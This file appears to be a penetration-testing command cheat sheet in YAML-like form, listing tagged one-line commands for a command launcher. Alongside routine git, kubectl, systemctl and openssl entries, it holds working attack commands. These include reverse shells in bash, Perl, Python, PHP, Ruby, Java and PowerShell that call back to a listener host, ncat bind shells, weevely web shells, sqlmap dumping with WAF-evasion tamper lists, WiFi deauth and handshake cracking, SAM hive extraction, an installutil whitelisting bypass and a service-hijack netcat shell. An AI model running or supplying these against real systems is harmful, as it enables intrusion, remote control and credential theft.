- - cmd: ncat --exec cmd.exe --allow <allowed_ip> -vnl <port> --ssl
- lang: sh
- tags: ncat
- desc: ncat bind shell ssl filtered
- - cmd: ncat -v <ip> <port> --ssl
- lang: sh
- tags: ncat
- desc: ncat bind shell ssl connection
- - cmd: ncat --listen --proxy-type http <port>
- lang: sh
- tags: ncat
- desc: ncat HTTP WEB proxy
- - cmd: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
- lang: sh
- tags: pentest
- desc: bash reverse shell
- - cmd: perl -e 'use Socket; $i="<lhost>"; $p=<lport>; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); }; '
- lang: sh
- tags: pentest
- desc: perl reverse shell
- - cmd: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<lhost>",<lport>)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); '
- lang: sh
- tags: pentest
- desc: python reverse shell
- - cmd: php -r '$sock=fsockopen("<lhost>",<lport>); exec("/bin/sh -i <&3 >&3 2>&3"); '
- lang: sh
- tags: pentest
- desc: php reverse shell
- - cmd: ruby -rsocket -e'f=TCPSocket.open("<lhost>",<lport>).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- lang: sh
- tags: pentest
- desc: ruby reverse shell
- - cmd: 'r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<lhost>/<lport>; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()'
- lang: java
- tags: pentest
- desc: '[[java]] reverse shell'
- - cmd: $client = New-Object System.Net.Sockets.TCPClient('<lhost>',<lport>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()
- lang: ps1
- tags: pentest
- desc: '[[Arsenal/Windows/powershell]] reverse shell'
- - cmd: rlwrap nc -nlvp <port>
- lang: sh
- tags: pentest
- desc: windows listener autocompletion
- - cmd: python -c 'import pty; pty.spawn("/bin/bash")'
- lang: sh
- tags: pentest
- desc: interactive reverse shell - and Ctrl+Z (1)
- - cmd: stty raw -echo
- lang: sh
- tags: pentest
- desc: interactive reverse shell - on host - and do fg (2)
- - cmd: reset; stty rows <ROWS> cols <COLS>; export TERM=xterm-256color
- lang: sh
- tags: pentest
- desc: interactive reverse shell - on reverse (3)
- - cmd: weevely generate <password> <output_file|web_shell.php>
- lang: sh
- tags: web, shell, webshell, shellweb, weevely
- desc: weevely web shell generation with output file
- - cmd: weevely <url> <password>
- lang: sh
- tags: web, shell, webshell, shellweb, weevely
- desc: weevely web shell connection
- - cmd: sqlmap -u <url> -p <arguments> --dbs
- lang: sh
- tags: sql injection
- desc: basic sqlmap step 1
- - cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type>
- lang: sh
- tags: sql injection
- desc: basic sqlmap step 2
- - cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> --tables
- lang: sh
- tags: sql injection
- desc: basic sqlmap step 3
- - cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> --columns
- lang: sh
- tags: sql injection
- desc: basic sqlmap step 4
- - cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> -C <columns> --dump
- lang: sh
- tags: sql injection
- desc: basic sqlmap step 5
- - cmd: sqlmap -u <url> --dbs
- lang: sh
- tags: sql injection
- desc: sqlmap - list dbs
- - cmd: sqlmap -u <url> -D <db> --tables
- lang: sh
- tags: sql injection
- desc: sqlmap - list tables
- - cmd: sqlmap -u <url> -D <db> -T <table> --dump
- lang: sh
- tags: sql injection
- desc: sqlmap - dump a table
- - cmd: sqlmap -u <url> -D <db> -T <table> --columns
- lang: sh
- tags: sql injection
- desc: sqlmap - list columns of a table
- - cmd: sqlmap -u <url> -D <db> -T <table> -C <c1>,<c2> --dump; sqlmap -u <url> --os-shell; sqlmap -u <url> --file-read=<remote_file>; sqlmap -u <url> --file-write=<local_file> --file-dest=<remote_path_destination>
- lang: sh
- tags: sql injection
- desc: sqlmap - dump only some tables columns
- - cmd: sqlmap -u <url>
- lang: sh
- tags: sql injection
- desc: sqlmap - classic get
- - cmd: sqlmap -u <url> -d "<params>"; sqlmap -u <url> --cookie=<cookie>
- lang: sh
- tags: sql injection
- desc: sqlmap - classic post
- - cmd: sqlmap -r <request_file>; sqlmap -u '<url>' tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
- lang: sh
- tags: sql injection
- desc: sqlmap - use file
- - cmd: sqlmap -u '<url>' --level=5 --risk=3 -p '<parameter>' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
- lang: sh
- tags: sql injection
- desc: sqlmap - hardcore
- - cmd: sqlmap -u <url> --dbms=MYSQL tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
- lang: sh
- tags: sql injection
- desc: sqlmap - mysql tamper list
- - cmd: sqlmap -u <url> --dbms=MSSQL tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
- lang: sh
- tags: sql injection
- desc: sqlmap - mssql tamper list
- - cmd: cve-bin-tool <target>
- lang: sh
- tags: pentest
- desc: cve-bin-tool - scan target (file or directory) to detect versions and CVEs of embedded open source components
- - cmd: cve-bin-tool --offline <target>
- lang: sh
- tags: pentest
- desc: cve-bin-tool - offline scan
- - cmd: cve-bin-tool -r <component> <target>
- lang: sh
- tags: pentest
- desc: cve-bin-tool - scan for a given open source component (e.g. openssl)
- - cmd: cve-bin-tool -f html <target>
- lang: sh
- tags: pentest
- desc: cve-bin-tool - build HTML report
- - cmd: docker run --rm -it -v `pwd`:/tmp/EyeWitness eyewitness --web -x /tmp/EyeWitness/<nmap_file>.xml --prepend-https
- lang: sh
- tags: pentest
- desc: eyewitness - web screenshots
- - cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness nmap -f /data/<nmap_file>.xml
- lang: sh
- tags: pentest
- desc: gowitness - web screenshots (nmap xml file)
- - cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness file -f /data/<file>
- lang: sh
- tags: pentest
- desc: gowitness - web screenshots (file containing urls)
- - cmd: nmap -sn <ip_range>
- lang: sh
- tags: pentest
- desc: nmap - hosts alive
- - cmd: nmap -sC -sV <ip>
- lang: sh
- tags: pentest
- desc: nmap - classic scan
- - cmd: nmap -iL <targets_file>
- lang: sh
- tags: pentest
- desc: nmap - read targets from a file
- - cmd: nmap -sC -sV -oA <output_file> <ip>
- lang: sh
- tags: pentest
- desc: nmap - classic scan + save
- - cmd: nmap --top-ports 100 --open -sV <ip>
- lang: sh
- tags: pentest
- desc: nmap - quick scan top ports 100
- - cmd: nmap --top-ports 5000 --open -sV <ip>
- lang: sh
- tags: pentest
- desc: nmap - big top ports 5000
- - cmd: nmap -p- -sV <ip>
- lang: sh
- tags: pentest
- desc: nmap - full port
- - cmd: nmap <ip> -p<port_list> --open
- lang: sh
- tags: pentest
- desc: nmap - host with a given port
- - cmd: IP=<ip>; ; ports=$(nmap -p- --min-rate=1000 -n -T4 $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); ; nmap -Pn -sC -sV -p$ports $IP -oN scan.txt --reason --script=vuln
- lang: sh
- tags: pentest
- desc: nmap - FULL
- - cmd: nmap -sU <ip>
- lang: sh
- tags: pentest
- desc: nmap - udp scan
- - cmd: nmap --max-rate 100 -sC -sV <ip>
- lang: sh
- tags: pentest
- desc: nmap - low rate Classic
- - cmd: masscan -p 1-65535 <ip> -e <dev> --rate=1000
- lang: sh
- tags: pentest
- desc: massscan - full port
- - cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
- lang: sh
- tags: pentest
- desc: nmap - SMB signing disabled
- - cmd: proxychains nmap -n -sT -sV -Pn --open -oA <output_file> -iL <targets_file>
- lang: sh
- tags: pentest
- desc: nmap behind proxy - tcp connect (-sT) - no dns (-n)
- - cmd: service --status-all
- lang: sh
- tags: pentest
- desc: List services
- - cmd: service <service_name> status
- lang: sh
- tags: pentest
- desc: Status of a service
- - cmd: service <service_name> start
- lang: sh
- tags: pentest
- desc: Start a service
- - cmd: service <service_name> stop
- lang: sh
- tags: pentest
- desc: Stop a service
- - cmd: service <service_name> restart
- lang: sh
- tags: pentest
- desc: Restart a service
- - cmd: systemctl start <service_inactive>
- lang: sh
- tags: systemctl, service
- desc: Start service
- - cmd: systemctl stop <service_active>
- lang: sh
- tags: systemctl, service
- desc: Stop service
- - cmd: systemctl enable <service_disabled>
- lang: sh
- tags: systemctl, service
- desc: Enable service
- - cmd: systemctl disable <service_enabled>
- lang: sh
- tags: systemctl, service
- desc: Disable service
- - cmd: systemctl restart <service>
- lang: sh
- tags: systemctl, service
- desc: Restart service
- - cmd: systemctl reload <service_active>
- lang: sh
- tags: systemctl, service
- desc: Reload service
- - cmd: systemctl status <service>
- lang: sh
- tags: systemctl, service
- desc: Service status
- - cmd: systemctl list-units --type=service --state=running
- lang: sh
- tags: systemctl, service
- desc: List running services
- - cmd: systemctl list-unit-files --type=service --state=enabled
- lang: sh
- tags: systemctl, service
- desc: List enabled services
- - cmd: systemctl list-unit-files --type=service --state=disabled
- lang: sh
- tags: systemctl, service
- desc: List disabled services
- - cmd: git config --global user.name <name>
- lang: sh
- tags: pentest
- desc: Set global git user name
- - cmd: git config --global user.email <email>
- lang: sh
- tags: pentest
- desc: Set global git user email
- - cmd: git init
- lang: sh
- tags: pentest
- desc: Initializes a git repository
- - cmd: git clone -b <branch_name> <repository> <clone_directory>
- lang: sh
- tags: pentest
- desc: Clone a git repository
- - cmd: git remote --verbose
- lang: sh
- tags: pentest
- desc: View all available remote for a git repository
- - cmd: git remote add <remote_name> <remote_url>
- lang: sh
- tags: pentest
- desc: Adds a remote for a git repository
- - cmd: git remote rename <old_remote_name> <new_remote_name>
- lang: sh
- tags: pentest
- desc: Renames a remote for a git repository
- - cmd: git remote remove <remote_name>
- lang: sh
- tags: pentest
- desc: Remove a remote for a git repository
- - cmd: git checkout <branch>
- lang: sh
- tags: pentest
- desc: Checkout to branch
- - cmd: git status
- lang: sh
- tags: pentest
- desc: Displays the current status of a git repository
- - cmd: git diff <unstaged_files>
- lang: sh
- tags: pentest
- desc: Displays unstaged changes for file
- - cmd: git add <changed_files>;
- lang: sh
- tags: pentest
- desc: Stage single or multiple files
- - cmd: git add -A
- lang: sh
- tags: pentest
- desc: Stage all files in project
- - cmd: git commit -m <message>
- lang: sh
- tags: pentest
- desc: Saves the changes to a file in a commit
- - cmd: git push -u <remote_name> <branch_name>
- lang: sh
- tags: pentest
- desc: Pushes committed changes to remote repository
- - cmd: git push <remote_name> <branch>:<branch_to_overwrite>
- lang: sh
- tags: pentest
- desc: Pushes changes to a remote repository overwriting another branch
- - cmd: git push <remote_name> <branch_name> -f
- lang: sh
- tags: pentest
- desc: Overwrites remote branch with local branch changes
- - cmd: git pull --ff-only
- lang: sh
- tags: pentest
- desc: Pulls changes to a remote repo to the local repo
- - cmd: git merge <branch_name>
- lang: sh
- tags: pentest
- desc: Merges changes on one branch into current branch
- - cmd: git merge --abort
- lang: sh
- tags: pentest
- desc: Abort the current conflict resolution process, and try to reconstruct the pre-merge state.
- - cmd: git log
- lang: sh
- tags: pentest
- desc: Displays log of commits for a repo
- - cmd: git log --all --decorate --oneline --graph
- lang: sh
- tags: pentest
- desc: Displays formatted log of commits for a repo
- - cmd: git clean -dxf
- lang: sh
- tags: pentest
- desc: Clear everything
- - cmd: git rebase master -S -f
- lang: sh
- tags: pentest
- desc: Sign all commits in a branch based on master
- - cmd: git fetch origin pull/<pr_number>/head:pr/<pr_number> && git checkout pr/<pr_number>
- lang: sh
- tags: pentest
- desc: Checkout a branch from a fork
- - cmd: git submodule add <repository> <path>
- lang: sh
- tags: pentest
- desc: Add a new module
- - cmd: git submodule update --init
- lang: sh
- tags: pentest
- desc: Update module
- - cmd: git submodule update
- lang: sh
- tags: pentest
- desc: Update module without init
- - cmd: git submodule foreach git pull origin master
- lang: sh
- tags: pentest
- desc: Pull all submodules
- - cmd: git submodule update --init --recursive
- lang: sh
- tags: pentest
- desc: Update all submodules
- - cmd: git commit --no-verify
- lang: sh
- tags: pentest
- desc: Skip git hooks
- - cmd: git checkout -b <new_branch_name>
- lang: sh
- tags: pentest
- desc: Create new branch from current HEAD
- - cmd: git checkout -b <new_branch_name> <remote>/<branch_name>
- lang: sh
- tags: pentest
- desc: pull remote branch and switch to it
- - cmd: gitdumper <url>/.git/ <destination_dir>
- lang: sh
- tags: pentest
- desc: git dump
- - cmd: kubectl config get-contexts
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Print all contexts
- - cmd: kubectl config current-context
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Print current context of kubeconfig
- - cmd: kubectl config use-context <context>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Set context of kubeconfig
- - cmd: kubectl explain <resource>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Print resource documentation
- - cmd: kubectl get nodes
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get nodes (add option '-o wide' for details)
- - cmd: kubectl get namespaces
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get namespaces
- - cmd: kubectl get pods -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get pods from namespace (add option '-o wide' for details)
- - cmd: kubectl get pods --all-namespaces
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get pods from all namespace (add option '-o wide' for details)
- - cmd: kubectl get services -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get services from namespace
- - cmd: kubectl describe <resource>/<name> -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get details from resource on namespace
- - cmd: kubectl logs -f pods/<name> -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Print logs from namespace
- - cmd: kubectl get deployments -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Get deployments
- - cmd: kubectl edit deployment/<name> -n <namespace>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Edit deployments
- - cmd: kubectl drain <name>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Drain node in preparation for maintenance
- - cmd: kubectl uncordon <name>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Mark node as schedulable
- - cmd: kubectl cordon <name>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Mark node as unschedulable
- - cmd: kubectl top <type>
- lang: sh
- tags: kubernetes, k8s, kubectl
- desc: Display resource (cpu/memory/storage) usage
- - cmd: drupwn --users --nodes --modules --dfiles --themes enum <url>
- lang: sh
- tags: drupal, drupwn
- desc: drupwn classic
- - cmd: sudo docker run --rm -it immunit/drupwn --users --nodes --modules --dfiles --themes enum <url>
- lang: sh
- tags: drupal, drupwn
- desc: drupwn, docker
- - cmd: gobuster dir -u <url> -w <wordlist>
- lang: sh
- tags: fuzzer, fuzz, gobuster
- desc: gobuster scan classic
- - cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt,xml,md
- lang: sh
- tags: fuzzer, fuzz, gobuster
- desc: gobuster scan pentest classic fuzz
- - cmd: gobuster dir -u <url> -w <wordlist> -t 30
- lang: sh
- tags: fuzzer, fuzz, gobuster
- desc: gobuster scan high rate
- - cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt
- lang: sh
- tags: fuzzer, fuzz, gobuster
- desc: gobuster scan with adding extension
- - cmd: wfuzz -z range,1-1000 -u <url>FUZZ
- lang: sh
- tags: fuzzer, fuzz, wfuzz
- desc: 'wfuzz with number on url ( url : http://site/ )'
- - cmd: wfuzz -z file,<file> -u <url>FUZZ
- lang: sh
- tags: fuzzer, fuzz, wfuzz
- desc: 'wfuzz with wordlist on url ( url : http://site/ )'
- - cmd: wfuzz -z file,<file> -X post -u <url> -d 'FUZZ=1'
- lang: sh
- tags: fuzzer, fuzz, wfuzz
- desc: wfuzz on post parameter
- - cmd: dirb <url> -w /usr/share/wordlists/dirb/common.txt
- lang: sh
- tags: fuzzer, fuzz, dirb
- desc: dirb commons
- - cmd: ffuf -w <wordlist> -u <url>/FUZZ
- lang: sh
- tags: fuzzer, fuzz, ffuf
- desc: ffuf fuzz keyword in url
- - cmd: 'ffuf -w <wordlist> -u <url> -H "Host: FUZZ" -fs <response_size>'
- lang: sh
- tags: fuzzer, fuzz, ffuf
- desc: ffuf fuzz Host filter response size
- - cmd: ffuf -w <wordlist> -u <url>?<param>=FUZZ -fs <response_size>
- lang: sh
- tags: fuzzer, fuzz, ffuf
- desc: ffuf GET parameter fuzzing
- - cmd: ffuf -w <wordlist> -u <url> -X POST -d "username=admin\&password=FUZZ" -fc 401
- lang: sh
- tags: fuzzer, fuzz, ffuf
- desc: ffuf POST parameter fuzzing and filter response code 401
- - cmd: nikto -C all -h <url>
- lang: sh
- tags: fuzzer, fuzz, nikto
- desc: nikto - first vuln scan
- - cmd: feroxbuster --url <url>
- lang: sh
- tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
- desc: default scan
- - cmd: feroxbuster --url <url> -w <wordlist>
- lang: sh
- tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
- desc: default scan with wordlist
- - cmd: feroxbuster -u <url> -H "<header>" "<header>"
- lang: sh
- tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
- desc: Multiple headers
- - cmd: feroxbuster -u <proto|https>://[<ipv6>] --no-recursion -vv
- lang: sh
- tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
- desc: IPv6, non-recursive scan with INFO-level logging enabled
- - cmd: feroxbuster -u <url> --auto-bail
- lang: sh
- tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
- desc: Abort or reduce scan speed to individual directory scans when too many errors have occurred
- - cmd: 'python3 jwt_tool.py -M at -t "<url>" -rh "Authorization: Bearer <JWT_Token>" -rh "<other_header>" -rc "<cookies>"'
- lang: sh
- tags: jwttool, token, jwt
- desc: Jwt tool Mode all tests
- - cmd: python3 jwt_tool.py -Q "<jwttool_id>"
- lang: sh
- tags: jwttool, token, jwt
- desc: Jwt tool reuse query id
- - cmd: python3 jwt_tool.py -d <wordlists.txt> <JWT_token>
- lang: sh
- tags: jwttool, token, jwt
- desc: Jwt tool bruteforce key
- - cmd: openssl req -new -newkey rsa:<RSA_LENGTH> -nodes -out <OUTPUT_CSR> -keyout <OUTPUT_KEY>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Create a new signing request and key
- - cmd: openssl req -x509 -sha256 -nodes -days <VALIDITY> -newkey rsa:<RSA_LENGTH> -out <OUTPUT_CRT> -keyout <OUTPUT_KEY>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Create a new self-signed certificate
- - cmd: openssl req -out <OUTPUT_CSR> -key <INPUT_KEY> -new
- lang: sh
- tags: openssl, certificate, encryption
- desc: Create a signing request from existing key
- - cmd: openssl x509 -x509toreq -out <OUTPUT_CSR> -in <INPUT_CRT> -signkey <INPUT_KEY>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Create a signing request from existing certificate and key
- - cmd: openssl rsa -in <INPUT_KEY> -out <OUTPUT_PLAINTEXT_KEY>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Remove a passphrase from a private key
- - cmd: openssl x509 -inform der -in <INPUT_CRT> -out <OUTPUT_PEM>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Convert a DER encoded file to a PEM encoded file
- - cmd: openssl x509 -outform der -in <INPUT_PEM> -out <OUTPUT_CRT>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Convert a PEM encoded file to a DER encoded file
- - cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes
- lang: sh
- tags: openssl, certificate, encryption
- desc: Convert a PKCS12 encoded file containing a private key and certificates to PEM
- - cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nocerts
- lang: sh
- tags: openssl, certificate, encryption
- desc: Extract the private key from a PKCS12 encoded file
- - cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nokeys
- lang: sh
- tags: openssl, certificate, encryption
- desc: Extract the certificate from a PKCS12 encoded file
- - cmd: openssl pkcs12 -export -out <OUTPUT_PKCS12> -inkey <INPUT_KEY> -in <INPUT_CRT> -certfile <INPUT_CRT>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Convert a PEM certificate file and a private key to PKCS12 encoded file
- - cmd: openssl req -text -noout -verify -in <OUTPUT_CSR>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Validate a certificate signing request
- - cmd: openssl rsa -in <INPUT_KEY> -check
- lang: sh
- tags: openssl, certificate, encryption
- desc: Validate a private key
- - cmd: openssl x509 -in <INPUT_CRT> -text -noout
- lang: sh
- tags: openssl, certificate, encryption
- desc: Validate a certificate
- - cmd: openssl pkcs12 -info -in <INPUT_PKCS12>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Validate a PKCS12 file (.pfx or .p12)
- - cmd: openssl x509 -noout -modulus -in <INPUT_CRT> | openssl md5
- lang: sh
- tags: openssl, certificate, encryption
- desc: Compare the MD5 hash of a certificate
- - cmd: openssl rsa -noout -modulus -in <INPUT_KEY> | openssl md5
- lang: sh
- tags: openssl, certificate, encryption
- desc: Compare the MD5 hash of a private key
- - cmd: openssl req -noout -modulus -in <INPUT_CSR> | openssl md5
- lang: sh
- tags: openssl, certificate, encryption
- desc: Compare the MD5 hash of a certificate signing request
- - cmd: openssl s_client -connect <URL>:<PORT>
- lang: sh
- tags: openssl, certificate, encryption
- desc: Display the server certificate chain
- - cmd: msfconsole -x "use auxiliary/scanner/http/tomcat_enum"
- lang: sh
- tags: tomcat
- desc: tomcat manager bruteforce
- - cmd: msfconsole -x "use exploit/multi/http/tomcat_mgr_deploy"
- lang: sh
- tags: tomcat
- desc: tomcat deploy
- - cmd: curl -k -s <url> | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u
- lang: sh
- tags: web
- desc: extract links from an url
- - cmd: sudo docker run -it --network host --rm wpscanteam/wpscan --proxy http://127.0.0.1:8080 --url <url> --disable-tls-checks -e ap,tt,cb,dbe,u1-20,m --api-token <wpscan_apitoken>
- lang: sh
- tags: wpscan, wordpress
- desc: wpscan with docker and burp proxy
- - cmd: airmon-ng check kill
- lang: sh
- tags: pentest
- desc: airmon - Kill processes which can cause trouble
- - cmd: airmon-ng start <wlan_interface>
- lang: sh
- tags: pentest
- desc: airmon - start interface
- - cmd: airmon-ng stop <wlanmon_interface>
- lang: sh
- tags: pentest
- desc: airmon - stop interface
- - cmd: systemctl restart NetworkManager
- lang: sh
- tags: pentest
- desc: NetworkManager - Restart NetworkManager
- - cmd: airodump-ng <wlanmon_interface>
- lang: sh
- tags: pentest
- desc: airodump - listen to everything
- - cmd: airodump-ng --bssid <mac_address> -c <channel> -w <output_file> <wlanmon_interface>
- lang: sh
- tags: pentest
- desc: airodump - listen to specific SSID
- - cmd: aireplay-ng --deauth <deauth_count> -c <client_mac_address> -a <mac_address> <wlanmon_interface>
- lang: sh
- tags: pentest
- desc: aireplay - deauth client
- - cmd: aircrack-ng -w <dictionary> <input_file>
- lang: sh
- tags: pentest
- desc: aircrack - crack handshake for PSK
- - cmd: hostapd-wpe <hostapd_conf>
- lang: sh
- tags: pentest
- desc: hostapd-wpe - launch fake AP
- - cmd: kismet -c <wlan_interface>
- lang: sh
- tags: pentest
- desc: kismet - monitor WiFi
- - cmd: nmcli device set <wlan_interface> managed true
- lang: sh
- tags: pentest
- desc: nmcli - set back WiFi interface to managed mode
- - cmd: reaver -i <wlanmon_interface> -b <mac_address> -c <channel> -Z
- lang: sh
- tags: pentest
- desc: reaver - launch WPS pixiedust attack
- - cmd: hcxdumptool -i <wlanmon_interface> -o capture.pcapng --enable_status=1 -c <channel>
- lang: sh
- tags: pentest
- desc: hcxdumptool - WPA2-PSK PMKID Capture
- - cmd: hcxpcaptool -z test.16800 test.pcapng
- lang: sh
- tags: pentest
- desc: hcxdumptool -
- - cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U <full_path_to_app>
- lang: sh
- tags: application whitelisting, clm
- desc: whitelisting bypass with installutil
- - cmd: systeminfo
- lang: sh
- tags: pentest
- desc: get info system
- - cmd: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- lang: sh
- tags: pentest
- desc: get info system limited
- - cmd: findstr /si 'password' *.txt *.xml *.docx
- lang: sh
- tags: pentest
- desc: find passwords
- - cmd: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
- lang: sh
- tags: pentest
- desc: find passwords - group policy preference (ms14-025)
- - cmd: wmic qfe get Caption,Description,HotFixID,InstalledOn
- lang: sh
- tags: pentest
- desc: get patches
- - cmd: hostname; $env:computername
- lang: sh
- tags: pentest
- desc: get hostname
- - cmd: set
- lang: sh
- tags: pentest
- desc: show environment - List all environment variables
- - cmd: nslookup -type=any <userdnsdomain>.
- lang: sh
- tags: pentest
- desc: dns request for DC
- - cmd: wmic logicaldisk get caption,description,providername
- lang: sh
- tags: pentest
- desc: show mounted disks
- - cmd: dir C:\$Recycle.Bin /s /b
- lang: sh
- tags: pentest
- desc: show recycle bin
- - cmd: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
- lang: sh
- tags: pentest
- desc: get architecture
- - cmd: schtasks /query /fo LIST /v
- lang: sh
- tags: pentest
- desc: list scheduled tasks
- - cmd: schtasks /query /fo LIST 2>nul | findstr <taskname>
- lang: sh
- tags: pentest
- desc: list one scheduled task
- - cmd: tasklist /V
- lang: sh
- tags: pentest
- desc: list process
- - cmd: tasklist /SVC
- lang: sh
- tags: pentest
- desc: list process and links to started services
- - cmd: net start
- lang: sh
- tags: pentest
- desc: list windows service started (1)
- - cmd: wmic service list brief
- lang: sh
- tags: pentest
- desc: list services (2)
- - cmd: sc query
- lang: sh
- tags: pentest
- desc: list services (3)
- - cmd: dir /a "C:\Program Files"
- lang: sh
- tags: pentest
- desc: list installed software (1)
- - cmd: dir /a "C:\Program Files (x86)"
- lang: sh
- tags: pentest
- desc: list installed software (2)
- - cmd: reg query HKEY_LOCAL_MACHINE\SOFTWARE
- lang: sh
- tags: pentest
- desc: list installed software (3)
- - cmd: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
- lang: sh
- tags: pentest
- desc: show lsa cached credentials value
- - cmd: reg query HKLM /f password /t REG_SZ /s
- lang: sh
- tags: pentest
- desc: register query word password (1)
- - cmd: reg query HKCU /f password /t REG_SZ /s
- lang: sh
- tags: pentest
- desc: register query word password (2)
- - cmd: reg save HKLM\SAM 'C:\Windows\Temp\sam.save'; reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'; reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
- lang: sh
- tags: pentest
- desc: register query extract SAM
- - cmd: wmic shadowcopy call create Volume='C:\'
- lang: sh
- tags: pentest
- desc: create shadow copy
- - cmd: vssadmin list shadows
- lang: sh
- tags: pentest
- desc: list shadow copy
- - cmd: accesschk.exe /accepteula -ucqv <service_name>
- lang: sh
- tags: pentest
- desc: check service privilege
- - cmd: sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
- lang: sh
- tags: pentest
- desc: reconfigure service
- - cmd: sc config <service> obj= ".\LocalSystem" password= ""
- lang: sh
- tags: pentest
- desc: change service
- - cmd: net start <service>
- lang: sh
- tags: pentest
- desc: start service
- - cmd: accesschk.exe /accepteula -dqv "<file>"
- lang: sh
- tags: pentest
- desc: check permission (1)
- - cmd: cacls "<file>"
- lang: sh
- tags: pentest
- desc: check permission (2)
- - cmd: accesschk.exe -uwdqs Users <c>:\
- lang: sh
- tags: pentest
- desc: find weak folder permission
